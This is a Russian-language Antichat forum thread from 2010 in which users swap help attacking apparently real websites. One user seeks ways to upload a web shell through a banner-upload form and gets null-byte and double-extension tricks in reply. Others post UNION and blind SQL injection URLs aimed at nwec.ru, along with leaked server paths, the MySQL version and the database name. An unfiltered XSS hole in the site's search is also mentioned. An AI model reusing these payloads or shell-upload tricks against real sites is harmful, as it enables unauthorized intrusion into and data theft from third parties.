ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.03.2010, 17:51
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Bramin
народ подскажите пжл, есть доступ в админку пытаюсь залить шелл через форму добовления банера, не разрешает. доступа к файлу ./htaccess нет
способов масса, большинство описаны на форуме.
обрезать нульбайтом, двойное расширение, загрузка файла как есть, с последующим инклюдом его (если LFI на сайте или серве) ну и некоторые другие способы
|
|
|
11.03.2010, 18:01
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Да,вывод видел,это слепая,да?Так как узнать уязвимое поле?(
Я в уязвимостях не очень шарю. Просто в этом случае смог подобрать количество полей.
Я другого не могу понять (вчера спрашивал, но здесь не могу все-равно). Почему не выводится инфа когда ввожу типа USER()? Пробовал так:
Код:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,USER(),6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1+--+
Что не так? И как сделать чтобы выводилось?
|
|
|
|
11.03.2010, 18:06
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от CyberHunter
Я в уязвимостях не очень шарю. Просто в этом случае смог подобрать количество полей.
Я другого не могу понять (вчера спрашивал, но здесь не могу все-равно). Почему не выводится инфа когда ввожу типа USER()? Пробовал так:
Код:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,USER(),6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1+--+
Что не так? И как сделать чтобы выводилось? а с чего ты взял, что поле №5 принтабельное? По мне там просто слепая инъекция, совсем слепая:
Код:
http://www.nwec.ru/index.php?issue_id=57+and+substring(version(),1,1)=5
@@basedir: /usr/
@@tmpdir: /tmp/
@@datadir: /data/
version(): 5.0.77-log
database(): db_cevzap_1
@@version_compile_os: unknown-linux-gnu
хотя может и не так)
|
|
|
|
11.03.2010, 18:06
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199
Репутация:
127
|
|
двойное расширение не катит, пробовал. обрезать нульбайтом у меня получается так shell.%00.php не загружается.
|
|
|
|
11.03.2010, 18:12
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Pashkela у меня так ничего не показывает. Скажи как найти принтабельное поле?
Подставлять вместо каждой цифры? И можно ли как-то вывести эти данные так как написал я?
|
|
|
|
11.03.2010, 18:14
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
CyberHunter, это слепая инъекция. Принтабельных полей тут нет, вывода, соответственно, тоже.
|
|
|
|
11.03.2010, 18:18
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
CyberHunter, это слепая инъекция. Принтабельных полей тут нет, вывода, соответственно, тоже.
И что делать в таких случаях? Где можно об этом почитать?
|
|
|
|
11.03.2010, 18:52
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Дайте плз кто-нибудь ссылку на инфу о слепых инъекциях.
|
|
|
|
11.03.2010, 19:01
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от CyberHunter
Дайте плз кто-нибудь ссылку на инфу о слепых инъекциях.
https://forum.antichat.ru/showthread.php?t=119047
|
|
|
|
11.03.2010, 20:06
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от MastaBass1
Тоесть сайт не нагнуть, зато поиск не фильтрует <> и скрипты спокойно выполняются)(Может и не в тему написал)=))
http://www.nwec.ru/index.php?issue_id=57 AND Length((SELECT albums.id FROM db_cevzap_1.albums LIMIT 0,1))<32
..
Последний раз редактировалось [Feldmarschall]; 11.03.2010 в 20:09..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1972191){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1972470){kind=avatar}
Похожие темы
Линейный вид
